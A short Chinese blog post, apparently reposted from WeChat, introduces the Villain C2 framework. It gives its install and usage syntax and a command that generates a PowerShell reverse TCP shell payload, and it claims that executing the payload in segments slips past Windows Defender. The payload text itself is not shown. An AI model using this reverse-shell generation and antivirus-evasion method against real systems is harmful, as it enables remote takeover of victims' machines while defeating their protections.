Villain

关于Villain

Villain 是一个高级 Stage 0/1 C2 框架，可以处理多个基于 TCP 套接字和 HoaxShell 的反弹 Shell，通过附加功能（命令、实用程序）增强其功能，并在连接的同级服务器（在不同机器上运行的 Villain 实例）之间共享它们。

项目地址：https://github.com/t3l3machus/Villain

安装

apt install villain

Villain 使用示例

villain [-h] [-p PORT] [-x HOAX_PORT] [-n NETCAT_PORT] [-f FILE_SMUGGLER_PORT] [-i] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

Defender检测绕过

首先使用Villain生成payload，以Windows PowerShell为例：

Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=eth0

可以看到生成了一段基于Powershell的Payload的，并且贴心的为你复制到了剪切板：

分解

上面这段基于Powershell的Payload的如果直接粘贴在Windows 的Powershell中会直接被Windows自带的Windows Defender “干掉”：

那么如果我们将这段Payload “分段执行”：

可以看到，C2 Server顺利收到反弹Shell且没有被Windows Defender 拦截：

原文始发于微信公众号（骨哥说事）：打造绕过Defender的Windows reverse_tcp Shell【部分】